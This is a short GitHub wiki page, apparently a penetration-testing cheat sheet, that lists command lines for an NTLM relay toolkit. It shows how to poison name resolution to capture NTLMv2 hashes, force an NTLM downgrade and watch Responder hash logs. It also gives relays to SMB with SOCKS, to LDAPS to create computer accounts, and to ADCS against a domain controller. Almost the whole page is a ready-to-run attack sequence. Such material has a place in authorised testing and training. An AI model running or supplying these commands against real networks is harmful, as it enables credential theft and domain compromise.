Standard attacks - oscpname/RELAY_scenarios GitHub Wiki

MANUAL: https://github.com/nullenc0de/relaytoolkit

Tools:

• toolkit

Attack - Initial Access testing:

#Start with analyze mode to identify opportunities:
sudo python3 toolkit.py --auto --analyze -i eth0
#Run full auto sequence when ready:
sudo python3 toolkit.py --auto -i eth0 -dc 192.168.1.10 -d corp.local
#Monitor captured hashes in Responder logs:
tail -f /usr/share/responder/logs/SMB-NTLMv2-SSP-192.168.1.10.txt

Under the hood:

Commands:

Auto mode

# Full automatic testing
sudo python3 toolkit.py --auto \
    -i eth0 \
    -dc 192.168.1.10 \
    -d corp.local \
    --target-range 192.168.1.0/24

# Analysis mode only (no poisoning)
sudo python3 toolkit.py --auto --analyze -i eth0

Basic collection

# Start hash collection
sudo python3 toolkit.py -i eth0

# With NTLM downgrade
sudo python3 toolkit.py -i eth0 -c 1122334455667788

SMB Relay

# SMB relay with SOCKS
sudo python3 toolkit.py -i eth0 --relay --relay-type smb --socks

# LDAPS relay for computer account creation
sudo python3 toolkit.py -i eth0 --relay --relay-type ldaps --dc-ip 192.168.1.10

# ADCS relay
sudo python3 toolkit.py -i eth0 --relay --relay-type adcs --dc-ip 192.168.1.10